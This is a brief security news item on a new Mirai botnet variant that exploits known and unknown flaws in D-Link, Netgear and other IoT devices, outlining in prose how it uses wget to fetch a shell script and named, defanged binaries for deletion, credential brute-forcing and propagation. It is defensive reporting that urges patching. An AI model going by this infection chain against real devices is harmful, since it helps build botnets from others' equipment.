The security flaws in D-Link, netgear, etc. are being abused by the new variant of Mirai. Since the month of February, this has targeted six known and three previously unknown vulnerabilities, to infect systems and add them to the botnet network.
There are more than 60 variants of Mirai which are known to take advantage of both known and unknown vulnerabilities in the Iot devices.
The latest attacks are based on the Mirai’s source code, and they have some additional vulnerabilities targeting the Iot devices.
Use of binaries-
After initializing, the botnet uses wget utility for downloading a shell script from the malwares infrastructure, the shell scripts downloads various Mirai binaries and subsequently run them-
- Lolol[.]sh- This has the ability to delete the key folders from the target machine;
- Install[.]sh- Downloads various files and packages that comprises of files that include combinations of multiple credential that are used for brute-force and nbrute.
- Dark.[arch]: Mainly used for propagation by using the initial exploits of Mirai.
Due to this, unpatched connected devices always remain at risk. That is why it is important that patches are applied and updated regularly to the Iot devices and firmware.